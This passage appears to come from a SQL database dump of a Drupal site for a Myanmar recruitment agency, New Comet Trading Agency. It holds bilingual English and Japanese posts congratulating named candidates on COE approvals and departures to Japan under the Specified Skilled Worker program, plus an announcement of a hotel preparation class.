data-entity-uuid=\"c43806d7-2f92-4a6c-8c06-6c82f3900d19\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/8_1.jpg\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 150, 600, 'ja', 0, '<blockquote><h2>CPR（介護）に関する研修</h2><p>彼らは秋田県内での活動に熱心に取り組んでおり、長期にわたって秋田県に居住する機会を望んでいます。</p></blockquote><img src=\"/sites/default/files/inline-images/1_4.jpg\" data-entity-uuid=\"ad5e101a-5241-43cd-9069-d760e9ef3c36\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/2_4.jpg\" data-entity-uuid=\"a20f83b8-a905-41b8-9079-ac4b161e1e7b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/3_4.jpg\" data-entity-uuid=\"f6c7d9b8-a004-4b48-947e-c507abda48cd\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/4_4.jpg\" data-entity-uuid=\"5f8315d4-ffef-4281-a387-e6aa2d39c807\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/5_2.jpg\" data-entity-uuid=\"53bf4679-be37-45b4-8b6c-9d7805cee062\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/6_2.jpg\" data-entity-uuid=\"b4f638b2-4d3a-4997-869d-30c5ec49b2b7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/7_1.jpg\" data-entity-uuid=\"18d57598-7865-4a60-a82a-729bfef38207\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/8_1.jpg\" data-entity-uuid=\"c43806d7-2f92-4a6c-8c06-6c82f3900d19\" data-entity-type=\"file\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 151, 601, 'en', 0, '<blockquote><h2>Congratulations For Getting COE !</h2></blockquote><p>Congratulations HLAING MEE MEE HTIKE &amp; PYAE SU SU SAN For Getting COE</p><img data-entity-uuid=\"6e7d323c-8cd7-45b2-abbf-dcb0a548499a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-02-1f97a5a9475b3df30898f35e7d78128e278077a680ad7ad99d9d7db9b6121a9e_9e9a91b98a3dc4dc.jpg\"><img>', '', 'full_html'),
('activities', 0, 151, 602, 'en', 0, '<blockquote><h2>Congratulations For Getting COE !</h2></blockquote><p>Congratulations HLAING MEE MEE HTIKE &amp; PYAE SU SU SAN For Getting COE</p><img data-entity-uuid=\"6e7d323c-8cd7-45b2-abbf-dcb0a548499a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-02-1f97a5a9475b3df30898f35e7d78128e278077a680ad7ad99d9d7db9b6121a9e_9e9a91b98a3dc4dc.jpg\"><img>', '', 'full_html'),
('activities', 0, 151, 602, 'ja', 0, '<blockquote><h2>COE 取得おめでとうございます！</h2><p>HLAING MEE MEE HTIKE と PYAE SU SU SAN、COE 取得おめでとうございます</p></blockquote><img src=\"/sites/default/files/inline-images/0-02-02-1f97a5a9475b3df30898f35e7d78128e278077a680ad7ad99d9d7db9b6121a9e_9e9a91b98a3dc4dc.jpg\" data-entity-uuid=\"6e7d323c-8cd7-45b2-abbf-dcb0a548499a\" data-entity-type=\"file\"><p><img></p>', '', 'full_html'),
('activities', 0, 152, 603, 'en', 0, '<blockquote><h3><strong>COE 取得おめでとうございます! &nbsp; &nbsp;</strong></h3><p>HLAING MEE MEE HTIKE さん、COE 取得おめでとうございます</p></blockquote>', '', 'full_html'),
('activities', 0, 152, 604, 'en', 0, '<blockquote><h3><strong>COE 取得おめでとうございます! &nbsp; &nbsp;</strong></h3><p>HLAING MEE MEE HTIKE さん、COE 取得おめでとうございます</p></blockquote>', '', 'full_html'),
('activities', 0, 152, 604, 'ja', 0, '<blockquote><h3><strong>COE 取得おめでとうございます! &nbsp; &nbsp;</strong></h3><p>HLAING MEE MEE HTIKE さん、COE 取得おめでとうございます</p></blockquote>', '', 'full_html'),
('activities', 0, 153, 605, 'en', 0, '<blockquote><h2>Congratulations For Getting COE!</h2></blockquote><p>Congratulations MOE SET NAING &amp; PAING THU SAN &amp; HTET LIN AUNG &amp; THANT ZIN WIN &amp; HPONE MYAT NAING &amp; EI KAY ZIN For Getting COE</p><img data-entity-uuid=\"3b801756-32a5-4ecc-916b-2829712192f1\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-02-1b76df179d462b63dc7fd4d74ec23673ef537da2ef9512cda5a1f963c9121c2c_9d7d4d6411a5fc13.jpg\"><img data-entity-uuid=\"7075356e-77d5-46e2-a434-f266e7caeb6b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-02-3a51f787771946ab3b49e85d5cdce3b0a00767a9e154d09d7fe9c1d533ce3795_c1cf428317a08225.jpg\"><img data-entity-uuid=\"c806e6d9-7a65-402c-a48c-2ac1ea1d3457\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-02-40a8a26850c7e39adcd5f51733f0cd108b22df09bdf0bb90d81527e7aa22b163_6e5f738ce599cf66.jpg\"><img data-entity-uuid=\"2786a3aa-2f5d-4526-aab2-104d92d9644f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-02-4743d193219cdddf8b7397127a2d621408ebda3d0c377bae80bcf5bb80d28018_8dd8dd9fdbb97404.jpg\"><img data-entity-uuid=\"a4b5ff6e-5d7e-4e5f-ba7f-0d96456985b8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-02-c641d9f9e2a41a117c982c04052ae940f92411b3304b1f98433807656c14a46c_82f9081fbfbb1a33.jpg\"><img data-entity-uuid=\"4fb3e6b3-63f6-4639-98a9-ef6063b89503\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-02-f7aefec25d5c2a64f7d9ae30ae581f90cc511220e72b21a7e729f1018c76d419_cdeef27543ac2745.jpg\">', '', 'full_html'),
('activities', 0, 153, 606, 'en', 0, '<blockquote><h2>Congratulations For Getting COE!</h2></blockquote><p>Congratulations MOE SET NAING &amp; PAING THU SAN &amp; HTET LIN AUNG &amp; THANT ZIN WIN &amp; HPONE MYAT NAING &amp; EI KAY ZIN For Getting COE</p><img data-entity-uuid=\"3b801756-32a5-4ecc-916b-2829712192f1\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-02-1b76df179d462b63dc7fd4d74ec23673ef537da2ef9512cda5a1f963c9121c2c_9d7d4d6411a5fc13.jpg\"><img data-entity-uuid=\"7075356e-77d5-46e2-a434-f266e7caeb6b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-02-3a51f787771946ab3b49e85d5cdce3b0a00767a9e154d09d7fe9c1d533ce3795_c1cf428317a08225.jpg\"><img data-entity-uuid=\"c806e6d9-7a65-402c-a48c-2ac1ea1d3457\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-02-40a8a26850c7e39adcd5f51733f0cd108b22df09bdf0bb90d81527e7aa22b163_6e5f738ce599cf66.jpg\"><img data-entity-uuid=\"2786a3aa-2f5d-4526-aab2-104d92d9644f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-02-4743d193219cdddf8b7397127a2d621408ebda3d0c377bae80bcf5bb80d28018_8dd8dd9fdbb97404.jpg\"><img data-entity-uuid=\"a4b5ff6e-5d7e-4e5f-ba7f-0d96456985b8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-02-c641d9f9e2a41a117c982c04052ae940f92411b3304b1f98433807656c14a46c_82f9081fbfbb1a33.jpg\"><img data-entity-uuid=\"4fb3e6b3-63f6-4639-98a9-ef6063b89503\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-02-f7aefec25d5c2a64f7d9ae30ae581f90cc511220e72b21a7e729f1018c76d419_cdeef27543ac2745.jpg\">', '', 'full_html'),
('activities', 0, 153, 606, 'ja', 0, '<blockquote><h2>COE 取得おめでとうございます!</h2><p>MOE SET NAING、PAING THU SAN、HTET LIN AUNG、THANT ZIN WIN、HPONE MYAT NAING、EI KAY ZIN の COE 取得おめでとうございます</p></blockquote><img src=\"/sites/default/files/inline-images/0-02-02-1b76df179d462b63dc7fd4d74ec23673ef537da2ef9512cda5a1f963c9121c2c_9d7d4d6411a5fc13.jpg\" data-entity-uuid=\"3b801756-32a5-4ecc-916b-2829712192f1\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-02-3a51f787771946ab3b49e85d5cdce3b0a00767a9e154d09d7fe9c1d533ce3795_c1cf428317a08225.jpg\" data-entity-uuid=\"7075356e-77d5-46e2-a434-f266e7caeb6b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-02-40a8a26850c7e39adcd5f51733f0cd108b22df09bdf0bb90d81527e7aa22b163_6e5f738ce599cf66.jpg\" data-entity-uuid=\"c806e6d9-7a65-402c-a48c-2ac1ea1d3457\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-02-4743d193219cdddf8b7397127a2d621408ebda3d0c377bae80bcf5bb80d28018_8dd8dd9fdbb97404.jpg\" data-entity-uuid=\"2786a3aa-2f5d-4526-aab2-104d92d9644f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-02-c641d9f9e2a41a117c982c04052ae940f92411b3304b1f98433807656c14a46c_82f9081fbfbb1a33.jpg\" data-entity-uuid=\"a4b5ff6e-5d7e-4e5f-ba7f-0d96456985b8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-02-f7aefec25d5c2a64f7d9ae30ae581f90cc511220e72b21a7e729f1018c76d419_cdeef27543ac2745.jpg\" data-entity-uuid=\"4fb3e6b3-63f6-4639-98a9-ef6063b89503\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 154, 607, 'en', 0, '<p><strong>Departure to Japan – 14 June 2026</strong></p><p>New Comet Trading Agency is pleased to announce that the following candidates successfully departed for Japan on 14 June 2026 under the Specified Skilled Worker (Kaigo) Program.</p><ul><li>Khin Moe Thi</li><li>Khin Min Cho</li><li>Aye Mya Nilar Oo</li><li>Nan Dar Kyaw</li><li>Ei Ei Phyo</li></ul><p>We sincerely congratulate all five candidates and wish them success in their new careers in Japan.</p><p>May they enjoy a safe journey, achieve their professional goals, and become a source of pride and support for their families.</p><p>New Comet Trading Agency will continue to support Myanmar workers in pursuing employment opportunities abroad.</p>', '', 'full_html'),
('activities', 0, 154, 608, 'en', 0, '<p><strong>Departure to Japan – 14 June 2026</strong></p><p>New Comet Trading Agency is pleased to announce that the following candidates successfully departed for Japan on 14 June 2026 under the Specified Skilled Worker (Kaigo) Program.</p><ul><li>Khin Moe Thi</li><li>Khin Min Cho</li><li>Aye Mya Nilar Oo</li><li>Nan Dar Kyaw</li><li>Ei Ei Phyo</li></ul><p>We sincerely congratulate all five candidates and wish them success in their new careers in Japan.</p><p>May they enjoy a safe journey, achieve their professional goals, and become a source of pride and support for their families.</p><p>New Comet Trading Agency will continue to support Myanmar workers in pursuing employment opportunities abroad.</p>', '', 'full_html'),
('activities', 0, 154, 608, 'ja', 0, '<pre><code class=\"language-plaintext\">&lt;p&gt;&lt;strong&gt;2026年6月14日 日本出発&lt;/strong&gt;&lt;/p&gt;\r\n\r\n&lt;p&gt;ニューコメット・トレーディング・エージェンシーは、以下の5名の候補者が特定技能（介護）として日本へ出発されたことをご報告いたします。&lt;/p&gt;\r\n\r\n&lt;ul&gt;\r\n&lt;li&gt;KHIN MOE THI さん&lt;/li&gt;\r\n&lt;li&gt;KHIN MIN CHO さん&lt;/li&gt;\r\n&lt;li&gt;AYE MYA NILAR OO さん&lt;/li&gt;\r\n&lt;li&gt;NAN DAR KYAW さん&lt;/li&gt;\r\n&lt;li&gt;EI EI PHYO さん&lt;/li&gt;\r\n&lt;/ul&gt;\r\n\r\n&lt;p&gt;皆様の新しいキャリアのスタートを心よりお祝い申し上げます。&lt;/p&gt;\r\n\r\n&lt;p&gt;日本での生活と仕事が順調に進み、ご家族の支えとなる素晴らしい人材としてご活躍されることを願っております。&lt;/p&gt;\r\n\r\n&lt;p&gt;ニューコメット・トレーディング・エージェンシーは、今後もミャンマー人材の海外就労を支援してまいります。&lt;/p&gt;</code></pre>', '', 'full_html'),
('activities', 0, 154, 609, 'en', 0, '<p><strong>Departure to Japan – 14 June 2026</strong></p><p>New Comet Trading Agency is pleased to announce that the following candidates successfully departed for Japan on 14 June 2026 under the Specified Skilled Worker (Kaigo) Program.</p><ul><li>Khin Moe Thi</li><li>Khin Min Cho</li><li>Aye Mya Nilar Oo</li><li>Nan Dar Kyaw</li><li>Ei Ei Phyo</li></ul><p>We sincerely congratulate all five candidates and wish them success in their new careers in Japan.</p><p>May they enjoy a safe journey, achieve their professional goals, and become a source of pride and support for their families.</p><p>New Comet Trading Agency will continue to support Myanmar workers in pursuing employment opportunities abroad.</p>', '', 'full_html'),
('activities', 0, 154, 609, 'ja', 0, '<p data-start=\"940\" data-end=\"959\"><strong data-start=\"940\" data-end=\"959\">2026年6月14日 日本出発</strong></p><p data-start=\"961\" data-end=\"1027\">ニューコメット・トレーディング・エージェンシーは、以下の5名の候補者が特定技能（介護）として日本へ出発されたことをご報告いたします。</p><p data-start=\"1029\" data-end=\"1128\">• KHIN MOE THI さん<br>• KHIN MIN CHO さん<br>• AYE MYA NILAR OO さん<br>• NAN DAR KYAW さん<br>• EI EI PHYO さん</p><p data-start=\"1130\" data-end=\"1159\">皆様の新しいキャリアのスタートを心よりお祝い申し上げます。</p><p data-start=\"1161\" data-end=\"1213\">日本での生活と仕事が順調に進み、ご家族の支えとなる素晴らしい人材としてご活躍されることを願っております。</p><p data-start=\"1215\" data-end=\"1266\">ニューコメット・トレーディング・エージェンシーは、今後もミャンマー人材の海外就労を支援してまいります。</p>', '', 'full_html'),
('announcement', 0, 155, 610, 'en', 0, '<p><strong>Hotel Tokutei Preparation Class – New Intake Open</strong></p><p>New Comet Language Center is pleased to announce the opening of a new Hotel Tokutei Preparation Class for candidates who wish to work in hotels, ryokans, and resorts in Japan.</p><p>This course is designed to help students prepare for the Specified Skilled Worker (Tokutei Ginou) Hotel Examination, job interviews, and future workplace responsibilities in the hospitality industry.</p><p><strong>Course Information</strong></p><p>Start Date: 15 June 2026</p><p>Class Days:<br>Monday – Thursday</p><p>Class Time:<br>11:00 AM – 12:30 PM</p><p>Course Duration:<br>2 Months</p><p>Course Fee:<br>180,000 MMK</p><p><strong>Special Benefits</strong></p><p>• Textbook Included<br>• Uniform Included</p><p>The Hotel Tokutei sector is currently one of the most in-demand industries in Japan.</p><p>This course is recommended for individuals who wish to:</p><p>• Prepare for the Hotel Tokutei Examination<br>• Build a career in the hospitality industry<br>• Work in Japan through the Specified Skilled Worker Program</p><p>For further information, please contact us through our Facebook Page Messenger.</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/hotel-class-schedule-1.jpg\" data-entity-uuid=\"f6a7552f-366e-43ff-81c2-0b8b162f2677\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/hotel-class-schedule-2.jpg\" data-entity-uuid=\"05868599-9dfd-4060-95f1-78dbb8614222\" data-entity-type=\"file\">', '', 'full_html'),
('announcement', 0, 155, 611, 'en', 0, '<p><strong>Hotel Tokutei Preparation Class – New Intake Open</strong></p><p>New Comet Language Center is pleased to announce the opening of a new Hotel Tokutei Preparation Class for candidates who wish to work in hotels, ryokans, and resorts in Japan.</p><p>This course is designed to help students prepare for the Specified Skilled Worker (Tokutei Ginou) Hotel Examination, job interviews, and future workplace responsibilities in the hospitality industry.</p><p><strong>Course Information</strong></p><p>Start Date: 15 June 2026</p><p>Class Days:<br>Monday – Thursday</p><p>Class Time:<br>11:00 AM – 12:30 PM</p><p>Course Duration:<br>2 Months</p><p>Course Fee:<br>180,000 MMK</p><p><strong>Special Benefits</strong></p><p>• Textbook Included<br>• Uniform Included</p><p>The Hotel Tokutei sector is currently one of the most in-demand industries in Japan.</p><p>This course is recommended for individuals who wish to:</p><p>• Prepare for the Hotel Tokutei Examination<br>• Build a career in the hospitality industry<br>• Work in Japan through the Specified Skilled Worker Program</p><p>For further information, please contact us through our Facebook Page Messenger.</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/hotel-class-schedule-1.jpg\" data-entity-uuid=\"f6a7552f-366e-43ff-81c2-0b8b162f2677\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/hotel-class-schedule-2.jpg\" data-entity-uuid=\"05868599-9dfd-4060-95f1-78dbb8614222\" data-entity-type=\"file\">', '', 'full_html'),
('announcement', 0, 155, 611, 'ja', 0, '<p data-start=\"1201\" data-end=\"1222\"><strong data-start=\"1201\" data-end=\"1222\">ホテル特定技能対策クラス 新規開講</strong></p><p data-start=\"1224\" data-end=\"1300\">ニューコメット・ランゲージセンターでは、日本のホテル・旅館・リゾート施設での就職を目指す方々を対象に、ホテル分野特定技能試験対策クラスを開講いたします。</p><p data-start=\"1302\" data-end=\"1366\">本コースでは、特定技能（宿泊分野）試験対策だけでなく、面接対策や実際の職場で必要となる知識やマナーについても学ぶことができます。</p><p data-start=\"1368\" data-end=\"1377\"><strong data-start=\"1368\" data-end=\"1377\">コース概要</strong></p><p data-start=\"1379\" data-end=\"1394\">開講日：<br>2026年6月15日</p><p data-start=\"1396\" data-end=\"1408\">授業日：<br>月曜日～木曜日</p><p data-start=\"1410\" data-end=\"1433\">授業時間：<br>午前11時00分～午後12時30分</p><p data-start=\"1435\" data-end=\"1444\">受講期間：<br>2か月</p><p data-start=\"1446\" data-end=\"1462\">受講料：<br>180,000 MMK</p><p data-start=\"1464\" data-end=\"1470\"><strong data-start=\"1464\" data-end=\"1470\">特典</strong></p><p data-start=\"1472\" data-end=\"1488\">• 教科書付き<br>• 制服付き</p><p data-start=\"1490\" data-end=\"1520\">宿泊分野の特定技能人材は、現在日本国内で高い需要があります。</p><p data-start=\"1522\" data-end=\"1542\">本コースは以下のような方におすすめです。</p><p data-start=\"1544\" data-end=\"1605\">• ホテル特定技能試験の合格を目指す方<br>• ホスピタリティ業界に興味のある方<br>• 日本で働くことを目標としている方</p><p data-start=\"1607\" data-end=\"1651\">詳細については、Facebookページのメッセンジャーよりお気軽にお問い合わせください。</p><hr><img data-entity-uuid=\"d3949097-3a11-4865-a6ac-80b245fc2aae\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/hotel-class-schedule-1_0.jpg\"><p>&nbsp;</p><img data-entity-uuid=\"814b935c-75d7-4711-87d8-c5e6c258bc59\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/hotel-class-schedule-2_0.jpg\">', '', 'full_html'),
('activities', 0, 156, 612, 'en', 0, '<p>On April 21, 2026, New Comet Agency proudly bid farewell to our candidate, Ms. Thwel Thwel Aye, as she departed for Japan. She will be working in the restaurant and food service industry under the Specified Skilled Worker (Tokutei Ginou) program.</p><p>The entire team at New Comet Agency wishes her a safe flight and great success in her new career. We are confident that she will excel in her work in Japan and make her family proud. Congratulations!</p>', '', 'full_html'),
('activities', 0, 156, 613, 'en', 0, '<p>On April 21, 2026, New Comet Agency proudly bid farewell to our candidate, Ms. Thwel Thwel Aye, as she departed for Japan. She will be working in the restaurant and food service industry under the Specified Skilled Worker (Tokutei Ginou) program.</p><p>The entire team at New Comet Agency wishes her a safe flight and great success in her new career. We are confident that she will excel in her work in Japan and make her family proud. Congratulations!</p>', '', 'full_html'),
('activities', 0, 156, 613, 'ja', 0, '<p data-path-to-node=\"6\">2026年4月21日、当機関（New Comet Agency）を通じて採用された候補生、Thwel Thwel Ayeさんが、特定技能（外食業）の資格で日本へ向けて出発いたしました。</p><p data-path-to-node=\"7\">彼女の安全なフライトと日本でのご活躍、そしてご家族の誇りとなるような素晴らしいキャリアを築かれることをスタッフ一同、心よりお祈り申し上げます。</p>', '', 'full_html'),
('activities', 0, 157, 614, 'ja', 0, '<p>2026年4月26日、当機関（New Comet Agency）を通じて採用された9名の候補生が、特定技能（外食業）の資格で日本へ向けて出発いたしました。</p><p>出発した候補生は以下の通りです：</p><ul><li>Hnin Su Hlaing さん</li><li>Ei Thandar Naing さん</li><li>Hnin Eaindray Phyo さん</li><li>Pyae Pyae Phyo さん</li><li>Khaing Shwe Syn Soe さん</li><li>Nwe Nwe Khaing さん</li><li>Yadana Lwin さん</li><li>Zin Mon Myat さん</li><li>Wai Mon Thant さん</li></ul><p>彼女たちの安全なフライトと日本でのご活躍、そしてご家族の誇りとなるような素晴らしいキャリアを築かれることをスタッフ一同、心よりお祈り申し上げます。</p><img src=\"/sites/default/files/inline-images/0-02-06-6bc017149a9c7874b366c76ecb6ef5710b9df983ea90aa778ccb8853375afe9d_22683ea0d5a.jpg\" data-entity-uuid=\"76aa84f2-d49b-4dda-843b-31ab9da86af3\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/0-02-06-48cfc583aa8d8d586c04213d5c19bacd33da2460dd554ef5253d9e3aeb7c4d2d_22683ead90b.jpg\" data-entity-uuid=\"ed345dd8-a182-4bfc-a9d2-03fec09b6c9e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-06-b14bdc8b45008df92a86cbb501f8e473f4f7a08433c3fc9289dce6f86474c1f4_22683e8176a.jpg\" data-entity-uuid=\"c50c2499-ad3f-4392-9c32-c0620ce45716\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-06-faef4433d60de7c7c609e3e09fed101395e5407311e4bbc4e0f50e58289fa580_22683ea3f7a.jpg\" data-entity-uuid=\"3662bc11-1345-4c3a-8860-99cb9fd86368\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 157, 615, 'en', 0, '<p data-path-to-node=\"2\">On April 26, 2026, New Comet Agency proudly bid farewell to a group of nine talented candidates as they departed for Japan. They will be working in the restaurant and food service industry under the Specified Skilled Worker (Tokutei Ginou) program.</p><p data-path-to-node=\"3\">The departing candidates are:</p><ul data-path-to-node=\"4\"><li><p data-path-to-node=\"4,0,0\">Hnin Su Hlaing</p></li><li><p data-path-to-node=\"4,1,0\">Ei Thandar Naing</p></li><li><p data-path-to-node=\"4,2,0\">Hnin Eaindray Phyo</p></li><li><p data-path-to-node=\"4,3,0\">Pyae Pyae Phyo</p></li><li><p data-path-to-node=\"4,4,0\">Khaing Shwe Syn Soe</p></li><li><p data-path-to-node=\"4,5,0\">Nwe Nwe Khaing</p></li><li><p data-path-to-node=\"4,6,0\">Yadana Lwin</p></li><li><p data-path-to-node=\"4,7,0\">Zin Mon Myat</p></li><li><p data-path-to-node=\"4,8,0\">Wai Mon Thant</p></li></ul><p data-path-to-node=\"5\">The entire team at New Comet Agency wishes them a safe flight and great success in their new careers. We are confident that they will excel in their work in Japan and make their families proud. Congratulations!</p><img src=\"/sites/default/files/inline-images/0-02-06-6bc017149a9c7874b366c76ecb6ef5710b9df983ea90aa778ccb8853375afe9d_22683ea0d5a.jpg\" data-entity-uuid=\"76aa84f2-d49b-4dda-843b-31ab9da86af3\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/0-02-06-48cfc583aa8d8d586c04213d5c19bacd33da2460dd554ef5253d9e3aeb7c4d2d_22683ead90b.jpg\" data-entity-uuid=\"ed345dd8-a182-4bfc-a9d2-03fec09b6c9e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-06-b14bdc8b45008df92a86cbb501f8e473f4f7a08433c3fc9289dce6f86474c1f4_22683e8176a.jpg\" data-entity-uuid=\"c50c2499-ad3f-4392-9c32-c0620ce45716\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-06-faef4433d60de7c7c609e3e09fed101395e5407311e4bbc4e0f50e58289fa580_22683ea3f7a.jpg\" data-entity-uuid=\"3662bc11-1345-4c3a-8860-99cb9fd86368\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 157, 615, 'ja', 0, '<p>2026年4月26日、当機関（New Comet Agency）を通じて採用された9名の候補生が、特定技能（外食業）の資格で日本へ向けて出発いたしました。</p><p>出発した候補生は以下の通りです：</p><ul><li>Hnin Su Hlaing さん</li><li>Ei Thandar Naing さん</li><li>Hnin Eaindray Phyo さん</li><li>Pyae Pyae Phyo さん</li><li>Khaing Shwe Syn Soe さん</li><li>Nwe Nwe Khaing さん</li><li>Yadana Lwin さん</li><li>Zin Mon Myat さん</li><li>Wai Mon Thant さん</li></ul><p>彼女たちの安全なフライトと日本でのご活躍、そしてご家族の誇りとなるような素晴らしいキャリアを築かれることをスタッフ一同、心よりお祈り申し上げます。</p><img src=\"/sites/default/files/inline-images/0-02-06-6bc017149a9c7874b366c76ecb6ef5710b9df983ea90aa778ccb8853375afe9d_22683ea0d5a.jpg\" data-entity-uuid=\"76aa84f2-d49b-4dda-843b-31ab9da86af3\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/0-02-06-48cfc583aa8d8d586c04213d5c19bacd33da2460dd554ef5253d9e3aeb7c4d2d_22683ead90b.jpg\" data-entity-uuid=\"ed345dd8-a182-4bfc-a9d2-03fec09b6c9e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-06-b14bdc8b45008df92a86cbb501f8e473f4f7a08433c3fc9289dce6f86474c1f4_22683e8176a.jpg\" data-entity-uuid=\"c50c2499-ad3f-4392-9c32-c0620ce45716\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-06-faef4433d60de7c7c609e3e09fed101395e5407311e4bbc4e0f50e58289fa580_22683ea3f7a.jpg\" data-entity-uuid=\"3662bc11-1345-4c3a-8860-99cb9fd86368\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 160, 620, 'en', 0, '<p><strong>A New Step Toward a Career in Japan</strong></p><p>New Comet Trading Agency is proud to announce that Ms. Toe Toe Hlaing has successfully passed the interview for a Specified Skilled Worker (Tokutei Ginou – Food Service) position in Japan.</p><p>Her success is the result of dedication, preparation, and a strong commitment to achieving her goal of working in Japan.</p><p>We would like to extend our heartfelt congratulations on this achievement and wish her continued success throughout the upcoming procedures and her future career in Japan.</p><p>New Comet Trading Agency remains dedicated to connecting qualified Myanmar candidates with rewarding employment opportunities in Japan.</p><p>&nbsp;</p><img data-entity-uuid=\"31db132d-6f42-4390-832c-4f4f7eb9c73c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Tokutei-Gaishoku-Toe-Toe-Hlaing%20%283-2-2026%29.jpg\">', '', 'full_html'),
('activities', 0, 160, 621, 'en', 0, '<p><strong>A New Step Toward a Career in Japan</strong></p><p>New Comet Trading Agency is proud to announce that Ms. Toe Toe Hlaing has successfully passed the interview for a Specified Skilled Worker (Tokutei Ginou – Food Service) position in Japan.</p><p>Her success is the result of dedication, preparation, and a strong commitment to achieving her goal of working in Japan.</p><p>We would like to extend our heartfelt congratulations on this achievement and wish her continued success throughout the upcoming procedures and her future career in Japan.</p><p>New Comet Trading Agency remains dedicated to connecting qualified Myanmar candidates with rewarding employment opportunities in Japan.</p><p>&nbsp;</p><img data-entity-uuid=\"31db132d-6f42-4390-832c-4f4f7eb9c73c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Tokutei-Gaishoku-Toe-Toe-Hlaing%20%283-2-2026%29.jpg\">', '', 'full_html'),
('activities', 0, 160, 621, 'ja', 0, '<p data-start=\"1078\" data-end=\"1095\"><strong data-start=\"1078\" data-end=\"1095\">日本でのキャリアへの第一歩</strong></p><p data-start=\"1097\" data-end=\"1172\">ニューコメット・トレーディング・エージェンシーは、TOE TOE HLAING さんが特定技能（外食業）の採用面接に合格されたことをご報告いたします。</p><p data-start=\"1174\" data-end=\"1226\">今回の合格は、ご本人の努力と熱心な準備の成果であり、日本で働くという目標に向けた大きな一歩となりました。</p><p data-start=\"1228\" data-end=\"1278\">この素晴らしい成果を心よりお祝い申し上げるとともに、今後の手続きと日本でのご活躍をお祈りいたします。</p><p data-start=\"1280\" data-end=\"1344\">ニューコメット・トレーディング・エージェンシーは、これからもミャンマー人材と日本企業をつなぐ架け橋として支援を続けてまいります。</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Tokutei-Gaishoku-Toe-Toe-Hlaing%20%283-2-2026%29.jpg\" data-entity-uuid=\"31db132d-6f42-4390-832c-4f4f7eb9c73c\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 160, 660, 'en', 0, '<p><strong>A New Step Toward a Career in Japan</strong></p><p>New Comet Trading Agency is proud to announce that Ms. Toe Toe Hlaing has successfully passed the interview for a Specified Skilled Worker (Tokutei Ginou – Food Service) position in Japan.</p><p>Her success is the result of dedication, preparation, and a strong commitment to achieving her goal of working in Japan.</p><p>We would like to extend our heartfelt congratulations on this achievement and wish her continued success throughout the upcoming procedures and her future career in Japan.</p><p>New Comet Trading Agency remains dedicated to connecting qualified Myanmar candidates with rewarding employment opportunities in Japan.</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Tokutei-Gaishoku-Toe-Toe-Hlaing%20%283-2-2026%29.jpg\" data-entity-uuid=\"31db132d-6f42-4390-832c-4f4f7eb9c73c\" data-entity-type=\"file\">', '', 'full_html'),
